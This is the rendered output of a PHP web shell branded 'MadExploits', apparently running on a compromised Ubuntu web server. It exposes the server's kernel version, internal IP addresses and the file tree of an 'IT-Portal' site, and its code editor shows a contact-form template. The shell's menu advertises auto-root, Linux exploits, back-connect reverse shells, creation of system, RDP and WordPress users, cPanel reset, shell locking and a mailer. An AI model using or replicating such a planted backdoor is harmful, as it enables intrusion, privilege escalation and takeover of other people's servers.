Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
IT-Portal /
templates /
[ HOME SHELL ]
Name
Size
Permission
Action
about.html
137
B
-rwxr-x--x
base.html
8.04
KB
-rwxr-x--x
contact.html
1.79
KB
-rwxr-x--x
index.html
2.33
KB
-rwxr-x--x
services.html
141
B
-rwxr-x--x
team.html
2.82
KB
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : contact.html
{% extends 'base.html' %} {% block title %} Contact {% endblock title %} {% block body %} <div class="container-fluid px-0"> <div id="carouselExampleCaptions" class="carousel slide" data-bs-ride="carousel"> <div class="carousel-indicators"> <button type="button" data-bs-target="#carouselExampleCaptions" data-bs-slide-to="0" class="active" aria-current="true" aria-label="Slide 1"></button> </div> <div class="carousel-inner"> <div class="carousel-item active"> <img src="/static/iiitd_background_compressed.jpg" class="d-block w-100" alt="..."> </div> </div> </div> </div> <div class="container my-4 py-4"> <form method="post" action="/contact"> {% csrf_token %} <div class="mb-3"> <label for="formGroupExampleInput" class="form-label">Name</label> <input type="text" class="form-control" id="formGroupExampleInput" name="Name" placeholder="Example input placeholder"> </div> <div class="mb-3"> <label for="formGroupExampleInput2" class="form-label">Email</label> <input type="text" class="form-control" id="formGroupExampleInput2" name="Email" placeholder="Another input placeholder"> </div> <div class="mb-3"> <label for="formGroupExampleInput2" class="form-label">Mobile</label> <input type="text" class="form-control" id="formGroupExampleInput2" name="Mobile" placeholder="Another input placeholder"> </div> <div class="mb-3"> <label for="formGroupExampleInput2" class="form-label">Des</label> <input type="text" class="form-control" id="formGroupExampleInput2" name="Des" placeholder="Another input placeholder"> </div> <button type="Submit" class="btn btn-outline-success">Submit</button> </form> </div> {% endblock body %}
Close